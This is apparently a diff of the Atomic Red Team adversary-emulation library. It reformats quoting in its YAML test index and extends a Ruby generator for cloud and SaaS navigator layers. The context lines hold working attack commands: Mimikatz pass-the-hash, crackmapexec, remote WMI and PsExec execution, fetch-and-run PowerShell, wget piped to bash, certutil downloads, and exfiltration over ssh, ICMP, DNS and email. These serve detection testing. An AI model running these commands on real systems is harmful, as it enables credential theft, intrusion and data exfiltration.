@@ -61172,7 +61172,7 @@ execution: description: 'Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. -' + ' supported_platforms: - windows input_arguments: @@ -61189,10 +61189,10 @@ execution: elevation_required: false command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} -' + ' cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1 -' + ' - name: Scheduled task Remote auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd description: | @@ -61228,11 +61228,11 @@ execution: command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} -' + ' cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1 -' + ' - name: Powershell Cmdlet Scheduled Task auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd description: | @@ -61254,7 +61254,7 @@ execution: cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 -' + ' - name: Task Scheduler via VBA auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 description: | @@ -61271,7 +61271,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -61282,7 +61282,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -61295,7 +61295,7 @@ execution: login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. -' + ' supported_platforms: - windows executor: 
@@ -61307,7 +61307,7 @@ execution: cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false >$null 2>&1 -' + ' T1053: technique: id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 @@ -61521,7 +61521,7 @@ execution: sc.exe delete #{service_name} cleanup_command: 'del C:\art-marker.txt >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Use PsExec to execute a command on a remote host @@ -61555,10 +61555,10 @@ execution: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe}) -' + ' prereq_command: 'if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -61568,7 +61568,7 @@ execution: command: '#{psexec_exe} \\#{remote_host} -u #{user_name} -p #{password} -accepteula "C:\Windows\System32\calc.exe" -' + ' name: command_prompt T1129: technique: @@ -61701,7 +61701,7 @@ execution: description: 'An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console. -' + ' supported_platforms: - windows input_arguments: @@ -61717,10 +61717,10 @@ execution: - description: 'Radmin Viewer Utility must be installed at specified location (#{radmin_exe}) -' + ' prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1) -' + ' get_prereq_command: | echo Downloading radmin installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer} @@ -61993,7 +61993,7 @@ execution: auto_generated_guid: 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 description: 'Creates and executes a simple bash script. -' + ' supported_platforms: - macos - linux 
@@ -62010,7 +62010,7 @@ execution: sh #{script_path} cleanup_command: 'rm #{script_path} -' + ' name: sh - name: Command-Line Interface auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c @@ -62027,7 +62027,7 @@ execution: wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash cleanup_command: 'rm /tmp/art-fish.txt -' + ' name: sh T1204: technique: @@ -62184,7 +62184,7 @@ execution: dependencies: - description: 'The 64-bit version of Microsoft Office must be installed -' + ' prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application" @@ -62195,7 +62195,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -62204,7 +62204,7 @@ execution: cleanup_command: 'Get-WmiObject win32_process | Where-Object {$_.CommandLine -like "*mshta*"} | % { "$(Stop-Process $_.ProcessID)" } | Out-Null -' + ' name: powershell - name: Extract Memory via VBA auto_generated_guid: 8faff437-a114-4547-9a60-749652a03df6 @@ -62223,7 +62223,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -62234,7 +62234,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -62243,7 +62243,7 @@ execution: cleanup_command: 'Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin" -ErrorAction Ignore -' + ' name: powershell T1059.003: technique: 
@@ -62294,7 +62294,7 @@ execution: description: 'Creates and executes a simple batch script. Upon execution, CMD will briefly launch to run the batch script then close again. -' + ' supported_platforms: - windows input_arguments: @@ -62310,27 +62310,27 @@ execution: dependencies: - description: 'Batch file must exist on disk at specified location (#{script_path}) -' + ' prereq_command: 'if (Test-Path #{script_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item #{script_path} -Force | Out-Null Set-Content -Path #{script_path} -Value "#{command_to_execute}" executor: command: 'Start-Process #{script_path} -' + ' cleanup_command: 'Remove-Item #{script_path} -Force -ErrorAction Ignore -' + ' name: powershell - name: Writes text to a file and displays it. auto_generated_guid: 127b4afe-2346-4192-815c-69042bec570e description: 'Writes text to a file and display the results. This test is intended to emulate the dropping of a malicious file to disk. -' + ' supported_platforms: - windows input_arguments: @@ -62345,17 +62345,17 @@ execution: executor: command: 'echo "#{message}" > "#{file_contents_path}" & type "#{file_contents_path}" -' + ' cleanup_command: 'del "#{file_contents_path}" -' + ' name: command_prompt - name: Suspicious Execution via Windows Command Shell auto_generated_guid: d0eb3597-a1b3-4d65-b33b-2cda8d397f20 description: 'Command line executed via suspicious invocation. Example is from the 2021 Threat Detection Report by Red Canary. -' + ' supported_platforms: - windows input_arguments: @@ -62446,7 +62446,7 @@ execution: executor: command: 'wmic useraccount get /ALL /format:csv -' + ' name: command_prompt - name: WMI Reconnaissance Processes auto_generated_guid: 5750aa16-0e59-4410-8b9a-8a47ca2788e2 @@ -62458,7 +62458,7 @@ execution: executor: command: 'wmic process get caption,executablepath,commandline /format:csv -' + ' name: command_prompt - name: WMI Reconnaissance Software auto_generated_guid: 718aebaa-d0e0-471a-8241-c5afa69c7414 
@@ -62470,7 +62470,7 @@ execution: executor: command: 'wmic qfe get description,installedOn /format:csv -' + ' name: command_prompt - name: WMI Reconnaissance List Remote Services auto_generated_guid: 0fd48ef7-d890-4e93-a533-f7dedd5191d3 @@ -62494,7 +62494,7 @@ execution: executor: command: 'wmic /node:"#{node}" service where (caption like "%#{service_search_string}%") -' + ' name: command_prompt - name: WMI Execute Local Process auto_generated_guid: b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3 @@ -62511,11 +62511,11 @@ execution: executor: command: 'wmic process call create #{process_to_execute} -' + ' cleanup_command: 'wmic process where name=''#{process_to_execute}'' delete >nul 2>&1 -' + ' name: command_prompt - name: WMI Execute Remote Process auto_generated_guid: 9c8ef159-c666-472f-9874-90c8d60d136b @@ -62546,11 +62546,11 @@ execution: command: 'wmic /user:#{user_name} /password:#{password} /node:"#{node}" process call create #{process_to_execute} -' + ' cleanup_command: 'wmic /user:#{user_name} /password:#{password} /node:"#{node}" process where name=''#{process_to_execute}'' delete >nul 2>&1 -' + ' name: command_prompt - name: Create a Process using WMI Query and an Encoded Command auto_generated_guid: 7db7a7f9-9531-4840-9b30-46220135441c @@ -62567,7 +62567,7 @@ execution: executor: command: 'powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA -' + ' name: command_prompt - name: Create a Process using obfuscated Win32_Process auto_generated_guid: 10447c83-fc38-462a-a936-5102363b1c43 @@ -62880,7 +62880,7 @@ lateral-movement: command: '[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7") -' + ' name: powershell T1210: technique: 
@@ -63133,7 +63133,7 @@ lateral-movement: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) -' + ' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -63147,13 +63147,13 @@ lateral-movement: command: '#{mimikatz_path} "sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}" -' + ' name: command_prompt - name: crackmapexec Pass the Hash auto_generated_guid: eb05b028-16c8-4ad8-adea-6f5b219da9a9 description: 'command execute with crackmapexec -' + ' supported_platforms: - windows input_arguments: @@ -63182,18 +63182,18 @@ lateral-movement: - description: 'CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe}) -' + ' prereq_command: 'if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 } -' + ' get_prereq_command: 'Write-Host Automated installer not implemented yet, please install crackmapexec manually at this location: #{crackmapexec_exe} -' + ' executor: command: 'crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command} -' + ' name: command_prompt T1550.003: technique: @@ -63272,7 +63272,7 @@ lateral-movement: auto_generated_guid: dbf38128-7ba7-4776-bedf-cc2eed432098 description: 'Similar to PTH, but attacking Kerberos -' + ' supported_platforms: - windows input_arguments: @@ -63292,10 +63292,10 @@ lateral-movement: dependencies: - description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe}) -' + ' prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip" 
@@ -63384,7 +63384,7 @@ lateral-movement: net start sesshijack cleanup_command: 'sc.exe delete sesshijack >nul 2>&1 -' + ' name: command_prompt elevation_required: true T1021.001: @@ -63456,7 +63456,7 @@ lateral-movement: auto_generated_guid: 355d4632-8cb9-449d-91ce-b566d0253d3e description: 'Attempt an RDP session via Remote Desktop Application to a DomainController. -' + ' supported_platforms: - windows input_arguments: @@ -63479,15 +63479,15 @@ lateral-movement: dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) { exit 0} else { exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' executor: command: | $Server=#{logonserver} @@ -63504,7 +63504,7 @@ lateral-movement: auto_generated_guid: 7382a43e-f19c-46be-8f09-5c63af7d3e2b description: 'Attempt an RDP session via Remote Desktop Application over Powershell -' + ' supported_platforms: - windows input_arguments: @@ -63769,7 +63769,7 @@ lateral-movement: auto_generated_guid: 3386975b-367a-4fbb-9d77-4dcf3639ffd3 description: 'Connecting To Remote Shares -' + ' supported_platforms: - windows input_arguments: @@ -63793,13 +63793,13 @@ lateral-movement: command: 'cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}" -' + ' name: command_prompt - name: Map Admin Share PowerShell auto_generated_guid: 514e9cd7-9207-4882-98b1-c8f791bae3c5 description: 'Map Admin share utilizing PowerShell -' + ' supported_platforms: - windows input_arguments: 
@@ -63818,14 +63818,14 @@ lateral-movement: executor: command: 'New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name} -' + ' name: powershell - name: Copy and Execute File with PsExec auto_generated_guid: 0eb03d41-79e4-4393-8e57-6344856be1cf description: 'Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec). -' + ' supported_platforms: - windows input_arguments: @@ -63846,10 +63846,10 @@ lateral-movement: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe}) -' + ' prereq_command: 'if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -63879,7 +63879,7 @@ lateral-movement: command: 'cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1 -' + ' name: command_prompt elevation_required: true T1021.004: @@ -64110,7 +64110,7 @@ lateral-movement: description: 'An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console. -' + ' supported_platforms: - windows input_arguments: @@ -64126,10 +64126,10 @@ lateral-movement: - description: 'Radmin Viewer Utility must be installed at specified location (#{radmin_exe}) -' + ' prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1) -' + ' get_prereq_command: | echo Downloading radmin installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer} @@ -64422,7 +64422,7 @@ lateral-movement: executor: command: 'Enable-PSRemoting -Force -' + ' name: powershell elevation_required: true - name: Invoke-Command 
@@ -64445,7 +64445,7 @@ lateral-movement: executor: command: 'invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}} -' + ' name: powershell - name: WinRM Access with Evil-WinRM auto_generated_guid: efe86d95-44c4-4509-ae42-7bfd9d1f5b3d @@ -64805,7 +64805,7 @@ command-and-control: "#{query_type}" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout} -' + ' name: powershell - name: DNS Regular Beaconing auto_generated_guid: 3efc144e-1af8-46bb-8ca2-1376bb6db8b6 @@ -65603,7 +65603,7 @@ command-and-control: auto_generated_guid: 0fc6e977-cb12-44f6-b263-2824ba917409 description: 'Utilize rsync to perform a remote file copy (push) -' + ' supported_platforms: - linux - macos @@ -65627,13 +65627,13 @@ command-and-control: executor: command: 'rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path} -' + ' name: bash - name: rsync remote file copy (pull) auto_generated_guid: 3180f7d5-52c0-4493-9ea0-e3431a84773f description: 'Utilize rsync to perform a remote file copy (pull) -' + ' supported_platforms: - linux - macos @@ -65657,13 +65657,13 @@ command-and-control: executor: command: 'rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path} -' + ' name: bash - name: scp remote file copy (push) auto_generated_guid: 83a49600-222b-4866-80a0-37736ad29344 description: 'Utilize scp to perform a remote file copy (push) -' + ' supported_platforms: - linux - macos @@ -65687,13 +65687,13 @@ command-and-control: executor: command: 'scp #{local_file} #{username}@#{remote_host}:#{remote_path} -' + ' name: bash - name: scp remote file copy (pull) auto_generated_guid: b9d22b9a-9778-4426-abf0-568ea64e9c33 description: 'Utilize scp to perform a remote file copy (pull) -' + ' supported_platforms: - linux - macos 
@@ -65717,13 +65717,13 @@ command-and-control: executor: command: 'scp #{username}@#{remote_host}:#{remote_file} #{local_path} -' + ' name: bash - name: sftp remote file copy (push) auto_generated_guid: f564c297-7978-4aa9-b37a-d90477feea4e description: 'Utilize sftp to perform a remote file copy (push) -' + ' supported_platforms: - linux - macos @@ -65747,13 +65747,13 @@ command-and-control: executor: command: 'sftp #{username}@#{remote_host}:#{remote_path} <<< $''put #{local_file}'' -' + ' name: bash - name: sftp remote file copy (pull) auto_generated_guid: '0139dba1-f391-405e-a4f5-f3989f2c88ef' description: 'Utilize sftp to perform a remote file copy (pull) -' + ' supported_platforms: - linux - macos @@ -65777,14 +65777,14 @@ command-and-control: executor: command: 'sftp #{username}@#{remote_host}:#{remote_file} #{local_path} -' + ' name: bash - name: certutil download (urlcache) auto_generated_guid: dd3b61dd-7bbc-48cd-ab51-49ad1a776df0 description: 'Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works! -' + ' supported_platforms: - windows input_arguments: @@ -65799,17 +65799,17 @@ command-and-control: executor: command: 'cmd /c certutil -urlcache -split -f #{remote_file} #{local_path} -' + ' cleanup_command: 'del #{local_path} >nul 2>&1 -' + ' name: command_prompt - name: certutil download (verifyctl) auto_generated_guid: ffd492e3-0455-4518-9fb1-46527c9f241b description: 'Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works! -' + ' supported_platforms: - windows input_arguments: @@ -65831,7 +65831,7 @@ command-and-control: cleanup_command: 'Remove-Item "certutil-$(Get-Date -format yyyy_MM_dd)" -Force -Recurse -ErrorAction Ignore -' + ' name: powershell - name: Windows - BITSAdmin BITS Download auto_generated_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b 
@@ -65857,7 +65857,7 @@ command-and-control: command: 'C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path} -' + ' name: command_prompt - name: Windows - PowerShell Download auto_generated_guid: 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8 @@ -65879,17 +65879,17 @@ command-and-control: command: '(New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "#{destination_path}") -' + ' cleanup_command: 'Remove-Item #{destination_path} -Force -ErrorAction Ignore -' + ' name: powershell - name: OSTAP Worming Activity auto_generated_guid: 2ca61766-b456-4fcf-a35a-1233685e1cad description: 'OSTap copies itself in a specfic way to shares and secondary drives. This emulates the activity. -' + ' supported_platforms: - windows input_arguments: @@ -65966,7 +65966,7 @@ command-and-control: auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab description: 'Download a remote file using the whois utility -' + ' supported_platforms: - linux - macos @@ -65994,29 +65994,29 @@ command-and-control: dependencies: - description: 'The whois and timeout commands must be present -' + ' prereq_command: 'which whois && which timeout -' + ' get_prereq_command: 'echo "Please install timeout and the whois package" -' + ' executor: name: sh elevation_required: false command: 'timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file} -' + ' cleanup_command: 'rm -f #{output_file} -' + ' - name: File Download via PowerShell auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 description: 'Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary. -' + ' supported_platforms: - windows input_arguments: @@ -66050,7 +66050,7 @@ command-and-control: name: command_prompt command: 'finger base64_filedata@#{remote_host} -' + ' T1090.001: technique: external_references: 
@@ -66119,7 +66119,7 @@ command-and-control: executor: command: 'export #{proxy_scheme}_proxy=#{proxy_server} -' + ' cleanup_command: | unset http_proxy unset https_proxy @@ -66508,10 +66508,10 @@ command-and-control: dependencies: - description: 'ncat.exe must be available at specified location (#{ncat_exe}) -' + ' prereq_command: 'if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -ItemType Directory -Force -Path #{ncat_path} | Out-Null @@ -66525,7 +66525,7 @@ command-and-control: executor: command: 'cmd /c #{ncat_exe} #{server_ip} #{server_port} -' + ' name: powershell - name: Powercat C2 auto_generated_guid: 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e @@ -66674,13 +66674,13 @@ command-and-control: executor: command: 'Test-NetConnection -ComputerName #{domain} -port #{port} -' + ' name: powershell - name: Testing usage of uncommonly used port auto_generated_guid: 5db21e1d-dd9c-4a50-b885-b1e748912767 description: 'Testing uncommonly used port utilizing telnet. -' + ' supported_platforms: - linux - macos @@ -66696,7 +66696,7 @@ command-and-control: executor: command: 'telnet #{domain} #{port} -' + ' name: sh T1102.003: technique: @@ -66938,7 +66938,7 @@ command-and-control: -Minimum 1 -Maximum 999999).#{domain}&type=#{query_type}" -UseBasicParsing).Content } -' + ' name: powershell - name: DNS over HTTPS Regular Beaconing auto_generated_guid: 0c5f9705-c575-42a6-9609-cbbff4b2fc9b @@ -67128,7 +67128,7 @@ command-and-control: and using this to maintain access to the machine. Download of TeamViewer installer will be at the destination location when sucessfully executed. -' + ' supported_platforms: - windows executor: @@ -67150,7 +67150,7 @@ command-and-control: and use to establish C2. Download of AnyDesk installer will be at the destination location and ran when sucessfully executed. -' + ' supported_platforms: - windows executor: 
@@ -67169,7 +67169,7 @@ command-and-control: and use to establish C2. Download of LogMeIn installer will be at the destination location and ran when sucessfully executed. -' + ' supported_platforms: - windows executor: @@ -67189,7 +67189,7 @@ command-and-control: and use to establish C2. Download of GoToAssist installer will be at the destination location and ran when sucessfully executed. -' + ' supported_platforms: - windows executor: @@ -67258,7 +67258,7 @@ command-and-control: auto_generated_guid: 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 description: 'Utilizing a common technique for posting base64 encoded data. -' + ' supported_platforms: - macos - linux @@ -67564,7 +67564,7 @@ command-and-control: - description: "Curl must be installed on system \n" prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip" -Outfile $env:temp\curl.zip Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl @@ -67769,7 +67769,7 @@ exfiltration: auto_generated_guid: ab936c51-10f4-46ce-9144-e02137b2016a description: 'Take a file/directory, split it into 5Mb chunks -' + ' supported_platforms: - macos - linux @@ -67788,12 +67788,12 @@ exfiltration: prereq_command: 'if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else exit 0; fi; -' + ' get_prereq_command: 'if [ ! -d #{folder_path} ]; then mkdir -p #{folder_path}; touch #{folder_path}/safe_to_delete; fi; dd if=/dev/urandom of=#{folder_path}/#{file_name} bs=25000000 count=1 -' + ' executor: command: | cd #{folder_path}; split -b 5000000 #{file_name} @@ -67801,7 +67801,7 @@ exfiltration: cleanup_command: 'if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi; -' + ' name: sh T1048: technique: 
@@ -67880,7 +67880,7 @@ exfiltration: executor: command: 'ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz -' + ' name: sh - name: Exfiltration Over Alternative Protocol - SSH auto_generated_guid: 7c3cb337-35ae-4d06-bf03-3032ed2ec268 @@ -67910,7 +67910,7 @@ exfiltration: command: 'tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} ''cat > /Users.tar.gz.enc'' -' + ' name: sh T1048.002: technique: @@ -68282,13 +68282,13 @@ exfiltration: in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) } -' + ' name: powershell - name: Exfiltration Over Alternative Protocol - DNS auto_generated_guid: c403b5a4-b5fc-49f2-b181-d1c80d27db45 description: 'Exfiltration of specified file over DNS protocol. -' + ' supported_platforms: - linux executor: @@ -68333,7 +68333,7 @@ exfiltration: command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003 Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server} -' + ' name: powershell input_arguments: input_file: @@ -68946,16 +68946,16 @@ initial-access: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default -' + ' supported_platforms: - windows executor: command: 'net user guest /active:yes -' + ' cleanup_command: 'net user guest /active:no -' + ' name: command_prompt elevation_required: true T1078.002: @@ -69269,7 +69269,7 @@ initial-access: description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list -' + ' supported_platforms: - windows input_arguments: 
@@ -69282,12 +69282,12 @@ initial-access: type: String default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme" -' + ' dependency_executor_name: powershell dependencies: - description: 'Chrome must be installed -' + ' prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1} @@ -69651,7 +69651,7 @@ initial-access: jse_path: description: 'Path for the macro to write out the "malicious" .jse file -' + ' type: String default: C:\Users\Public\art.jse ms_product: @@ -69662,7 +69662,7 @@ initial-access: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -69673,7 +69673,7 @@ initial-access: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -69682,7 +69682,7 @@ initial-access: Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore -' + ' name: powershell T1566.002: technique: diff --git a/bin/generate-atomic-docs.rb b/bin/generate-atomic-docs.rb index 3e4e0078..d6be5034 100755 --- a/bin/generate-atomic-docs.rb +++ b/bin/generate-atomic-docs.rb 
@@ -52,7 +52,16 @@ class AtomicRedTeamDocs
     generate_navigator_layer! "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json", \
       "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json", \
       "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json", \
-      "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json"
+      "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json", \
+      "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json", \
+      "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-aws.json", \
+      "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json", \
+      "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-gcp.json", \
+      "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json", \
+      "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-saas.json", \
+      "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json", \
+      "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json", \
+      "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json"
 
     return oks, fails
   end
@@ -200,12 +209,23 @@ class AtomicRedTeamDocs # # Generates a MITRE ATT&CK Navigator Layer based on contributed techniques # - def generate_navigator_layer!(output_layer_path, output_layer_path_win, output_layer_path_mac, output_layer_path_lin) + def generate_navigator_layer!(output_layer_path, output_layer_path_win, output_layer_path_mac, output_layer_path_lin, output_layer_path_iaas, \ + output_layer_path_iaas_aws, output_layer_path_iaas_azure, output_layer_path_iaas_gcp, output_layer_path_containers, output_layer_path_saas, \ + output_layer_path_google_workspace, output_layer_path_azure_ad, output_layer_path_office_365) techniques = [] techniques_win = [] techniques_mac = [] techniques_lin = [] + techniques_iaas = [] + techniques_iaas_aws = [] + techniques_iaas_azure = [] + techniques_iaas_gcp = [] + techniques_containers = [] + techniques_saas = [] + techniques_google_workspace = [] + techniques_azure_ad = [] + techniques_office_365 = [] ATOMIC_RED_TEAM.atomic_tests.each do |atomic_yaml| begin 
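Review bot: The new signature takes thirteen positional path parameters and nothing ties a parameter's position to the platform it serves, so a caller that drops or reorders one argument silently writes a layer to the wrong file; the mismatch between `output_layer_path_saas` being accepted here and never used later in this method is exactly that failure mode. A single Hash keyed by platform would make the mapping explicit and let the body loop instead of repeating itself: `def generate_navigator_layer!(layer_paths)` called with `layer_paths = { 'windows' => win_path, 'iaas:aws' => aws_path, ... }`, and `techniques_by_platform = Hash.new { |h, k| h[k] = [] }` in place of the nine new `techniques_*` arrays. The method body continues beyond this hunk.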
@@ -227,10 +247,28 @@ class AtomicRedTeamDocs
         has_windows_tests = false
         has_macos_tests = false
         has_linux_tests = false
+        has_iaas_tests = false
+        has_iaas_aws_tests = false
+        has_iaas_azure_tests = false
+        has_iaas_gcp_tests = false
+        has_containers_tests = false
+        has_saas_tests = false
+        has_google_workspace_tests = false
+        has_azure_ad_tests = false
+        has_office_365_tests = false
+
         atomic_yaml['atomic_tests'].each do |atomic|
